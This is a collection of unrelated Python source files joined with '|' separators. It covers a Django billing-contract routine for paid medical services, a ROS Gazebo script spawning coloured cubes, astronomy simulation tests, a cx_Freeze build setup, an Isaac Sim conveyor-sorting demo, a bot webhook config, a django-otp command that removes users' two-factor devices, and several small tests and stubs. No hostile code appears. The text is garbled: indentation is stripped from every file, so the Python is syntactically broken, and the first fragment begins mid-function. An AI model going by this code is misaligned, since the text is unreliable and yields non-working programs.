# exec_person = request_data['user'].doctorprofile.get_full_fio()
patient_data = ind_card.get_data_individual()
p_agent = None
if ind_card.who_is_agent:
p_agent = getattr(ind_card, ind_card.who_is_agent)
p_payer = None
if ind_card.payer:
p_payer = ind_card.payer
# Получить все источники, у которых title-ПЛАТНО
ist_f = list(IstochnikiFinansirovaniya.objects.values_list('id').filter(title__exact='Платно'))
ist_f_list = [int(x[0]) for x in ist_f]
napr = Napravleniya.objects.filter(pk__in=ind_dir)
dir_temp = []
# Проверить, что все направления принадлежат к одной карте и имеют ист. финансирования "Платно"
num_contract_set = set()
for n in napr:
if n.istochnik_f_id in ist_f_list and n.client == ind_card:
num_contract_set.add(n.num_contract)
dir_temp.append(n.pk)
if not dir_temp:
return False
# получить УСЛУГИ по направлениям(отфильтрованы по "платно" и нет сохраненных исследований) в Issledovaniya
research_direction = get_research_by_dir(dir_temp)
if not research_direction:
return False
# получить по направлению-услугам цену из Issledovaniya
research_price = get_coast_from_issledovanie(research_direction)
# Получить Итоговую стр-ру данных
result_data = get_final_data(research_price)
sum_research = result_data[1]
# Контрольная сумма расчет: послдеовательность направлений+Итоговая сумма (стоимость денежная)
qr_napr = ','.join([str(elem) for elem in result_data[3]])
protect_val = sum_research.replace(' ', '')
bstr = (qr_napr + protect_val).encode()
protect_code = str(zlib.crc32(bstr))
today = utils.current_time()
date_now1 = datetime.datetime.strftime(today, '%y%m%d%H%M%S%f')[:-3]
date_now_str = str(ind_card.pk) + str(date_now1)
# Проверить записан ли номер контракта в направлениях, и контрольная сумма
# ПереЗаписать номер контракта Если в наборе направлений значение None, или в направлениях разные контракты,
# а также разные контрольные суммы, все перезаписать.
num_contract_set = set()
protect_code_set = set()
napr_end = Napravleniya.objects.filter(id__in=result_data[3])
for n in napr_end:
num_contract_set.add(n.num_contract)
protect_code_set.add(n.protect_code)
if len(num_contract_set) == 1 and None in num_contract_set or None in protect_code_set:
PersonContract.person_contract_save(date_now_str, protect_code, qr_napr, sum_research, patient_data['fio'], ind_card, p_payer, p_agent)
Napravleniya.objects.filter(id__in=result_data[3]).update(num_contract=date_now_str, protect_code=protect_code)
return PersonContract.pk
|
#!/usr/bin/env python
import rospy
from gazebo_msgs.srv import SpawnModel, SpawnModelRequest, SpawnModelResponse
# from gazebo_msgs.srv import ApplyBodyWrench, GetModelProperties, GetWorldProperties, SetModelState
from copy import deepcopy
from tf.transformations import quaternion_from_euler
sdf_cube = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>1.0</mu>
<mu2>1.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/Blue</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_dummy_cube = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/White</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_cube_blue = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<mesh>
<uri>file://box_qr.obj</uri>
</mesh>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_cube_green = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/Green</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_cube_red = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/Red</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
def create_cube_request(sdf_model, modelname, px, py, pz, rr, rp, ry, sx, sy, sz):
"""Create a SpawnModelRequest with the parameters of the cube given.
modelname: name of the model for gazebo
px py pz: position of the cube (and it's collision cube)
rr rp ry: rotation (roll, pitch, yaw) of the model
sx sy sz: size of the cube"""
cube = deepcopy(sdf_model)
# Replace size of model
size_str = str(round(sx, 3)) + " " + \
str(round(sy, 3)) + " " + str(round(sz, 3))
cube = cube.replace('SIZEXYZ', size_str)
# Replace modelname
cube = cube.replace('MODELNAME', str(modelname))
req = SpawnModelRequest()
req.model_name = modelname
req.model_xml = cube
req.initial_pose.position.x = px
req.initial_pose.position.y = py
req.initial_pose.position.z = pz
q = quaternion_from_euler(rr, rp, ry)
req.initial_pose.orientation.x = q[0]
req.initial_pose.orientation.y = q[1]
req.initial_pose.orientation.z = q[2]
req.initial_pose.orientation.w = q[3]
return req
if __name__ == '__main__':
rospy.init_node('spawn_models')
spawn_srv = rospy.ServiceProxy('/gazebo/spawn_sdf_model', SpawnModel)
rospy.loginfo("Waiting for /gazebo/spawn_sdf_model service...")
spawn_srv.wait_for_service()
rospy.loginfo("Connected to service!")
rospy.sleep(5)
# Spawn Box
req1 = create_cube_request(sdf_cube_red, "packagen1",
-0.8, 1.80, 1.0, # position -x 1.2 -y -2.5 -z 0.94
0.0, 0.0, 0.0, # rotation
0.15, 0.15, 0.15) # size
req2 = create_cube_request(sdf_cube_green, "packagen2",
-0.66, 2.80, 1.0, # position -x 1.2 -y -2.5 -z 0.94
0.0, 0.0, 0.0, # rotation
0.15, 0.15, 0.15) # size
req3 = create_cube_request(sdf_cube_blue, "packagen3",
-0.90, 3.80, 1.0, # position -x 1.2 -y -2.5 -z 0.94
0.0, 0.0, 0.0, # rotation
0.15, 0.15, 0.15) # size
rospy.sleep(1)
spawn_srv.call(req1)
rospy.sleep(1)
spawn_srv.call(req2)
rospy.sleep(1)
spawn_srv.call(req3)
rospy.sleep(1.0)
|
"""
Parsed Config File Produces Expected Behaviors - configurations
"""
import inspect
import os
import deeplenstronomy.deeplenstronomy as dl
doc = """
\tRunning tests from test_expected_behaviors_configurations.py
\tThe tests included in this module demonstrate that the properties of each
\tconfiguration were simulated as expected. These properties include the
\texpected size of each configuration, the objects and planes included, and
\twhether time-series functionalities appear as expected. The functions are:
\t\t- test_configuration_existence
\t\t\tTesting that all configurations present in the config file are found by
\t\t\tdeeplenstronomy and are present in the simulation outputs
\t\t- test_configuration_fractions
\t\t\tTesting that the FRACTION keyword for each configuration resulted in
\t\t\tthe expected number of images for that configuration being produced
\t\t- test_timeseries
\t\t\tTime-series functionalities, if present, get tested by the function
\t\t\ttest_configuration_fractions
\t\t- test_planes_and_objects
\t\t\tTesting that each specified object and plane is was included in the
\t\t\tsimulation and is present in the metadata corresponding to its
\t\t\tconfiguration
"""
print(doc)
# Below are all of the possible operation modes
kwargs_sets = {0: {}, # default arguments
1: {'save_to_disk': True},
2: {'save_to_disk': True, 'image_file_format': 'h5'},
3: {'save_to_disk': True, 'skip_image_generation': True},
4: {'store_in_memory': False},
5: {'store_sample': True},
6: {'skip_image_generation': True, 'survey': 'des'},
7: {'solve_lens_equation': True},
8: {'return_planes': True}
}
f = open('status.txt', 'r')
current_test = int(f.read().strip())
f.close()
# Generate the dataset
kwargs_set = kwargs_sets[current_test]
config_filename = 'config.yaml'
dataset = dl.make_dataset(config_filename, **kwargs_set)
has_images = [hasattr(dataset, x + '_images') for x in dataset.configurations]
has_metadata = [hasattr(dataset, x + '_metadata')
for x in dataset.configurations]
has_planes = [hasattr(dataset, x + '_planes') for x in dataset.configurations]
images_exist = [os.path.exists(dataset.outdir +'/' + x + '_images.' +
dataset.arguments['image_file_format'])
for x in dataset.configurations]
metadata_exist = [os.path.exists(dataset.outdir +'/' + x + '_metadata.csv')
for x in dataset.configurations]
planes_exist = [os.path.exists(dataset.outdir +'/' + x + '_planes.' +
dataset.arguments['image_file_format'])
for x in dataset.configurations]
# Begin test functions
def test_configuration_existence():
for conf in dataset.configurations:
assert conf in dataset.config_dict['GEOMETRY'].keys()
def test_configuration_fractions():
for conf in dataset.configurations:
frac = dataset.config_dict['GEOMETRY'][conf]['FRACTION']
simulated_images = int(frac * dataset.size)
if all(has_images):
assert eval(f'dataset.{conf}_images').shape[0] == simulated_images
if all(has_metadata):
# not time-series
if 'TIMESERIES' not in dataset.config_dict['GEOMETRY'][conf].keys():
assert len(eval(f'dataset.{conf}_metadata')) == simulated_images
# time-series
else:
nites = dataset.config_dict['GEOMETRY'][conf]['TIMESERIES']['NITES']
md_rows = len(nites) * simulated_images
assert md_rows == len(eval(f'dataset.{conf}_metadata'))
def test_timeseries():
# already tested in test_configuration_fractions()
pass
def test_planes_and_objects():
for conf in dataset.configurations:
if all(has_metadata):
md = eval(f'dataset.{conf}_metadata')
else:
# this test requires metadata
return
number_of_planes = 0
for plane in dataset.config_dict['GEOMETRY'][conf].keys():
if plane.startswith('PLANE_'):
number_of_planes += 1
number_of_objects = 0
for obj in dataset.config_dict['GEOMETRY'][conf][plane].keys():
if obj.startswith('OBJECT_'):
number_of_objects += 1
if all(has_metadata):
for band in dataset.bands:
num_md_cols = 0
for col in md.columns:
if (col.startswith(f'{plane}-{obj}') and
col.endswith(band)):
num_md_cols += 1
# Plane and obj info in metadata for band
assert num_md_cols > 0
# expected number of objects in plane
for band in dataset.bands:
md_objects = md[plane + '-NUMBER_OF_OBJECTS-' + band].values
assert all(md_objects == number_of_objects)
# expected number of planes in configuration
for band in dataset.bands:
md_planes = md['NUMBER_OF_PLANES-' + band].values
assert all(md_planes == number_of_planes)
|
import sys
from cx_Freeze import setup, Executable
base = None
# Uncomment to disable the console on Windows, once the thing is stable
#if sys.platform == "win32":
# base = "Win32GUI"
config = {
'description': 'Twitch Bot',
'author': 'Janne Enberg',
'url': 'https://github.com/lietu/twitch-bot',
'download_url': 'https://github.com/lietu/twitch-bot',
'author_email': 'janne.enberg@lietu.net',
'version': '0.1',
'install_requires': [
# str(r.req) for r in parse_requirements("requirements.txt")
],
'packages': [
'bot'
],
'scripts': [],
'name': 'bot'
}
packages = ['irc', 'jaraco', 'packaging', 'PySide']
namespace_packages = ['zc.lockfile', 'yg.lockfile']
include_files = ['db_migrations/', 'lua/', 'ui/']
excludes = ["settings"] # Let's not distribute the local settings.py file
includes = []
setup(
name=config["description"],
version=config["version"],
description=config["description"],
options={
"build_exe": {
"packages": packages,
"namespace_packages": namespace_packages,
"include_files": include_files,
"includes": includes,
"excludes": excludes
}
},
executables=[
Executable("twitchbot.py", base=base),
]
)
|
import os
import glob
from pathlib import Path
import numpy as np
import random
import carb
from PIL import Image
from tensorflow import keras
from pxr import Usd, UsdGeom, Gf, UsdPhysics
import omni.kit
from omni.isaac.examples.base_sample import BaseSample
from omni.isaac.core.objects import DynamicCuboid
from omni.isaac.core.utils.prims import create_prim, delete_prim
from omni.usd import get_context
from omni.kit.viewport import get_viewport_interface
from omni.isaac.core.prims.xform_prim import XFormPrim
from omni.isaac.core.materials import PreviewSurface
from omni.isaac.core.utils.rotations import euler_angles_to_quat
from omni.syntheticdata import sensors
import omni.syntheticdata._syntheticdata as sd
def setColliderSubtree(prim, approximationShape="none", execute_command_fn=None):
pit = iter(Usd.PrimRange(prim))
for p in pit:
if p.GetMetadata("hide_in_stage_window"):
pit.PruneChildren()
continue
if p.IsA(UsdGeom.Gprim) or p.IsInstanceable():
if len(p.GetAttribute("faceVertexIndices").Get()) > 0:
omni.physx.scripts.utils.setCollider(p, approximationShape, execute_command_fn)
def setRigidBody(prim, approximationShape, kinematic, custom_execute_fn=None):
omni.physx.scripts.utils.setPhysics(prim, kinematic, custom_execute_fn)
if prim.IsA(UsdGeom.Xformable):
setColliderSubtree(prim, approximationShape, custom_execute_fn)
else:
omni.physx.scripts.utils.setCollider(prim, approximationShape, custom_execute_fn)
def create_light():
create_prim(
"/World/SphereLight",
"SphereLight",
position=np.array([0, 500, 500]),
attributes={
"radius": 150,
"intensity": 5e4
}
)
def create_classification_camera():
create_prim(
"/World/ClassificationCamera",
"Camera",
orientation=np.array([0.33, 0.197, 0.464, 0.794]),
position=np.array([151, 250, 135])
)
def find_usd_assets(shapenet_dir, categories, max_asset_size=50):
"""Look for USD files under root/category for each category specified.
For each category, generate a list of all USD files found and select
assets up to split * len(num_assets) if `train=True`, otherwise select the
remainder.
"""
from omni.isaac.shapenet.utils import LABEL_TO_SYNSET
references = {}
for category in categories:
category_id = LABEL_TO_SYNSET[category]
all_assets = glob.glob(
os.path.join(shapenet_dir, category_id, "*/*.usd"),
recursive=True)
if max_asset_size is None:
assets_filtered = all_assets
else:
assets_filtered = []
for a in all_assets:
if os.stat(a).st_size > max_asset_size * 1e6:
carb.log_warn(
f"{a} skipped as it exceeded the max \
size {max_asset_size} MB.")
else:
assets_filtered.append(a)
num_assets = len(assets_filtered)
if num_assets == 0:
raise ValueError(
f"No USDs found for category {category} \
under max size {max_asset_size} MB.")
references[category] = assets_filtered
return references
def create_conveyor_anchor(plate_size):
size = 5
conveyor_anchor = create_prim(
"/World/Conveyor/Anchor",
"Cube",
position=np.array([0.0, -plate_size/2 - size, 0.0]),
scale=np.array([plate_size / 2, size, size]))
conveyor_anchor.GetAttribute("visibility").Set("invisible")
return conveyor_anchor
def create_conveyor_plate(stage, size, index):
plate_path = f"/World/Conveyor/Plates/Plate{index + 1}"
plate = DynamicCuboid(
prim_path=plate_path,
position=np.array([0, index * 100, 0.0]),
size=np.array([size - 5, size - 5, 10.0]),
color=np.array([0.28, 0.65, 1.0])
)
# prismatic joint
joint_path = f"/World/Conveyor/Joints/PrismaticJoint{index + 1}"
prismatic_joint = UsdPhysics.PrismaticJoint.Define(stage, joint_path)
prismatic_joint.CreateAxisAttr("Y")
prismatic_joint.CreateBody0Rel().SetTargets(["/World/Conveyor/Anchor"])
prismatic_joint.CreateBody1Rel().SetTargets([plate_path])
prismatic_joint.CreateLocalPos0Attr().Set(Gf.Vec3f(0.0, 1.0, 0.0))
prismatic_joint.CreateLocalPos1Attr().Set(Gf.Vec3f(0.0, -0.5, 0.0))
# add linear drive
driver = UsdPhysics.DriveAPI.Apply(
prismatic_joint.GetPrim(),
"linear")
driver.CreateTypeAttr("force")
driver.CreateMaxForceAttr(1000)
driver.CreateTargetVelocityAttr(200.0)
driver.CreateDampingAttr(1e10)
driver.CreateStiffnessAttr(0)
return plate
def create_pusher(stage, plate_size, index):
actuator_path = f"/World/Pushers/Actuators/Actuator{index + 1}"
anchor_path = f"/World/Pushers/Anchors/Anchor{index + 1}"
depth = 10
anchor = create_prim(
anchor_path,
"Cube",
position=np.array([
-plate_size/2 - depth - 5,
(index + 2) * plate_size * 2,
20.0]),
scale=np.array([5, 5, 5]))
anchor.GetAttribute("visibility").Set("invisible")
pusher = DynamicCuboid(
prim_path=actuator_path,
position=np.array([
-plate_size/2 - 5,
(index + 2) * plate_size * 2,
20.0]),
size=np.array([depth, plate_size * 2, 30]),
color=np.array([0.1, 0.1, 0.5])
)
mass_api = UsdPhysics.MassAPI.Apply(pusher.prim)
mass_api.CreateMassAttr(1)
# Prismatic joint
joint_path = f"/World/Pushers/Joints/Joint{index + 1}"
joint = UsdPhysics.PrismaticJoint.Define(stage, joint_path)
joint.CreateAxisAttr("X")
joint.CreateBody0Rel().SetTargets([anchor_path])
joint.CreateBody1Rel().SetTargets([actuator_path])
joint.CreateLocalPos0Attr().Set(Gf.Vec3f(1.0, 0.0, 0.0))
joint.CreateLocalPos1Attr().Set(Gf.Vec3f(-0.5, 0.0, 0.0))
# Linear drive. No position target is set, only activated when needed.
driver = UsdPhysics.DriveAPI.Apply(joint.GetPrim(), "linear")
driver.CreateTypeAttr("force")
driver.CreateMaxForceAttr(1000)
driver.CreateDampingAttr(2e4)
driver.CreateStiffnessAttr(1e5)
return driver
def create_bucket(stage, plate_size, index):
bucket_path = f"/World/Buckets/Bucket{index + 1}"
width = plate_size * 2
depth = width
height = 20
a = create_prim(
f"{bucket_path}/a",
"Cube",
position=np.array([
plate_size/2 + depth/2 - 10,
(index + 2) * 2 * plate_size - width / 2,
-height - 5
]),
scale=np.array([depth/2, 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
b = create_prim(
f"{bucket_path}/b",
"Cube",
position=np.array([
plate_size/2 + depth/2 - 10,
(index + 2) * 2 * plate_size + width / 2,
-height - 5
]),
scale=np.array([depth/2, 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
c = create_prim(
f"{bucket_path}/c",
"Cube",
position=np.array([
plate_size/2 + 5 - 10,
(index + 2) * 2 * plate_size,
-height - 5
]),
scale=np.array([5, width/2 - 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
d = create_prim(
f"{bucket_path}/d",
"Cube",
position=np.array([
plate_size/2 + depth - 5 - 10,
(index + 2) * 2 * plate_size,
-height - 5
]),
scale=np.array([5, width/2 - 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
UsdPhysics.CollisionAPI.Apply(a)
UsdPhysics.CollisionAPI.Apply(b)
UsdPhysics.CollisionAPI.Apply(c)
UsdPhysics.CollisionAPI.Apply(d)
class Conveyor2(BaseSample):
def __init__(self) -> None:
super().__init__()
return
def setup_scene(self):
world = self.get_world()
self.model = keras.models.load_model("/home/bjnortier/isaac/sorting/save_at_30-augmented-3.h5")
self.categories = [
"bus", "car", "plane", "rocket", "watercraft"
]
shapenet_dir = Path(os.environ["SHAPENET_LOCAL_DIR"])
self.asset_references = find_usd_assets(
f"{shapenet_dir}_nomat",
self.categories)
self.num_classes = len(self.categories)
self.num_plates = self.num_classes * 2 + 4
plate_size = 100.0
self.max_plate_position = plate_size * self.num_plates
self.widget_index = 0
self.plate_reset_count = 0
stage = get_context().get_stage()
world.scene.add_ground_plane(z_position=-45.0)
create_light()
create_classification_camera()
create_conveyor_anchor(plate_size)
self.plates = []
for i in range(self.num_plates):
self.plates.append(create_conveyor_plate(stage, plate_size, i))
self.pushers = []
for i in range(self.num_classes):
self.pushers.append(create_pusher(stage, plate_size, i))
for i in range(self.num_classes):
create_bucket(stage, plate_size, i)
viewport_interface = get_viewport_interface()
viewport_handle = viewport_interface.create_instance()
vp = viewport_interface.get_viewport_window(viewport_handle)
vp.set_active_camera("/World/ClassificationCamera")
vp.set_texture_resolution(299, 299)
self.classification_viewport = vp
self.sd_interface = sd.acquire_syntheticdata_interface()
self.is_sensor_initialized = False
# # Create the first widget
self.drop_widget(y_position=100.0)
return
def drop_widget(self, y_position=0.0):
category = random.choice(self.categories)
asset_reference = random.choice(self.asset_references[category])
widget_path = f"/World/widget_{self.widget_index}"
widget_prim = create_prim(
widget_path,
"Xform",
scale=np.array([50.0, 50.0, 50.0]),
orientation=euler_angles_to_quat(
np.array([90.0, 0.0, 0.0]),
degrees=True),
position=np.array([0.0, y_position, 50.0]),
usd_path=asset_reference,
semantic_label=category)
self.current_widget_category = category
widget = XFormPrim(widget_path)
material = PreviewSurface(
prim_path="/World/Looks/ShapeMaterial",
color=np.array([0.1, 0.6, 0.1]))
widget.apply_visual_material(material)
# Determine bounds and translate to sit on the Z=0 plane
orientation_on_plane = euler_angles_to_quat(
np.array([90.0, 0.0, 0.0]),
degrees=True)
widget.set_local_pose(
np.array([0.0, 0.0, 0.0]),
orientation_on_plane)
bounds = UsdGeom.Mesh(widget_prim).ComputeWorldBound(0.0, "default")
new_position = np.array([0.0, 0.0, -bounds.GetBox().GetMin()[2] + 5.0])
widget.set_local_pose(new_position)
mass_api = UsdPhysics.MassAPI.Apply(widget_prim)
mass_api.CreateMassAttr(1)
setRigidBody(widget_prim, "convexHull", False)
self.widget = widget
self.widget_index += 1
self.widget_class = None
self.classification_requested = False
self.classification_complete = False
self.arm_activated = False
for pusher in self.pushers:
pusher.CreateTargetPositionAttr(0.0)
async def setup_post_load(self):
self._world = self.get_world()
self._world.add_physics_callback("sim_step", callback_fn=self.sim_step_callback)
return
def sim_step_callback(self, step_size):
if not self.is_sensor_initialized:
print("Waiting for sensor to initialize")
sensor = sensors.create_or_retrieve_sensor(
self.classification_viewport, sd.SensorType.Rgb)
self.is_sensor_initialized = \
self.sd_interface.is_sensor_initialized(sensor)
if self.is_sensor_initialized:
print("Sensor initialized!")
for plate in self.plates:
# When a plate reaches the end ov the conveyour belt,
# reset it's position to the start. Drop a widget if it's
# the first plate
plate_position, _ = plate.get_world_pose()
if plate_position[1] > self.max_plate_position:
plate_position[1] -= self.max_plate_position
plate.set_world_pose(plate_position)
self.plate_reset_count += 1
if self.plate_reset_count == self.num_plates:
self.plate_reset_count = 0
self.drop_widget()
# Classify the widget when it passes under the camera
if not self.classification_requested:
widget_position, _ = self.widget.get_world_pose()
if widget_position[1] > 100:
self.capture_gt()
self.classification_requested = True
if self.classification_complete and not self.arm_activated:
widget_position, _ = self.widget.get_world_pose()
if widget_position[1] > (self.widget_class + 1) * 200 + 100:
self.arm_activated = True
self.pushers[self.widget_class].CreateTargetPositionAttr(120.0)
def capture_gt(self):
rgb = sensors.get_rgb(self.classification_viewport)
# Discard alpha channel
rgb = rgb[:, :, :3]
input = np.expand_dims(rgb, axis=0)
prediction = self.model.predict(input)
self.widget_class = np.argmax(prediction)
print(f"actual:predicted {self.current_widget_category}:{self.categories[self.widget_class]}")
image = Image.fromarray(rgb)
image.save("/tmp/rgb.png")
self.classification_complete = True
async def setup_pre_reset(self):
return
async def setup_post_reset(self):
return
def world_cleanup(self):
return
|
import os
# Bot token
BOT_TOKEN = os.getenv('BOT_TOKEN')
# Web application setup
WEBAPP_HOST = '0.0.0.0'
WEBAPP_PORT = int(os.getenv('PORT'))
# Webhook setup
WEBHOOK_HOST = 'https://neural-painter-bot.herokuapp.com'
WEBHOOK_PATH = f'/webhook/{BOT_TOKEN}'
WEBHOOK_URL = f'{WEBHOOK_HOST}{WEBHOOK_PATH}'
|
from django.core.management.base import BaseCommand, CommandError
try:
from django.contrib.auth import get_user_model
except ImportError:
from django.contrib.auth.models import User
else:
User = get_user_model()
from django_otp import devices_for_user
class Command(BaseCommand):
"""
Command for disabling two-factor authentication for certain users.
The command accepts any number of usernames, and will remove all OTP
devices for those users.
Example usage::
manage.py disable bouke steve
"""
args = '<username username ...>'
help = 'Disables two-factor authentication for the given users'
def handle(self, *args, **options):
for username in args:
try:
user = User.objects.get_by_natural_key(username)
except User.DoesNotExist:
raise CommandError('User "%s" does not exist' % username)
for device in devices_for_user(user):
device.delete()
|
import unittest
from app.models import Comments
class CommentsModelTest(unittest.TestCase):
def setUp(self):
self.new_comment = Comments(comment='a')
def test_instance(self):
self.assertEqual(self.new_comment.comment, 'a')
def test_save_comment(self):
self.new_comment.save_comment()
self.assertTrue(len(Comments.query.all()) > 0)
def test_get_comment_by_id(self):
self.new_comment.save_comment()
got_comment = Comments.get_comment(1)
self.assertTrue(len(got_comment) > 0)
if __name__ == '__main__':
unittest.main()
|
#!/bin/env dls-python
from sys import version_info
if version_info.major == 2:
import __builtin__ as builtins # Allows for Python 2/3 compatibility, 'builtins' is namespace for inbuilt functions
else:
import builtins
import unittest
from mock import patch, MagicMock
p = patch('dls_ade.Server')
server_mock = MagicMock()
m = p.start()
m.return_value = server_mock
from dls_ade import dls_list_modules
p.stop()
class ParserTest(unittest.TestCase):
def setUp(self):
self.parser = dls_list_modules.make_parser()
def test_parser_understands_domain(self):
args = self.parser.parse_args("-i TS".split())
self.assertEqual(args.area, "ioc")
self.assertEqual(args.domain_name, "TS")
class PrintModuleListTest(unittest.TestCase):
def setUp(self):
self.server_mock = server_mock
def tearDown(self):
self.server_mock.reset_mock()
def test_server_repo_list_called(self):
source = "test/source"
dls_list_modules.get_module_list(source)
self.server_mock.get_server_repo_list.assert_called_once_with(source)
def test_given_valid_source_then_list_of_modules(self):
self.server_mock.get_server_repo_list.return_value = [
"test/source/module", "test/source/module2.git"
]
source = "test/source"
module_list = dls_list_modules.get_module_list(source)
self.assertIsNotNone(module_list)
self.assertListEqual(module_list, ['module', 'module2'])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File : train.py
# Author: Alvin(Xinyao) Sun <xinyao1@ualberta.ca>
# Date : 02.05.2021
import logging
import os
import sys
import hydra
import pytorch_lightning as pl
from omegaconf import DictConfig, OmegaConf
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
log = logging.getLogger(__name__)
@hydra.main(config_path='config', config_name='train_config')
def main(cfg: DictConfig):
print(OmegaConf.to_yaml(cfg))
pl.seed_everything(cfg.seed)
# ------------
# data
# ------------
data_module = hydra.utils.instantiate(cfg.data)
# ------------
# model
# ------------
model = hydra.utils.instantiate(cfg.model)
# ------------
# training
# ------------
trainer = pl.Trainer(**(cfg.pl_trainer), checkpoint_callback=True)
log.info('run training...')
train_dataloader = data_module.train_dataloader()
val_dataloader = data_module.val_dataloader()
trainer.fit(model,
train_dataloaders=train_dataloader,
val_dataloaders=[val_dataloader])
if __name__ == '__main__':
try:
main()
except Exception as e:
log.error(e)
exit(1)
|
from .wasserstein import wasserstein_distance
from .bottleneck import bottleneck_distance
__author__ = "Marc Glisse"
__copyright__ = "Copyright (C) 2020 Inria"
__license__ = "MIT"
|
# -*- coding: utf-8 -*-
#
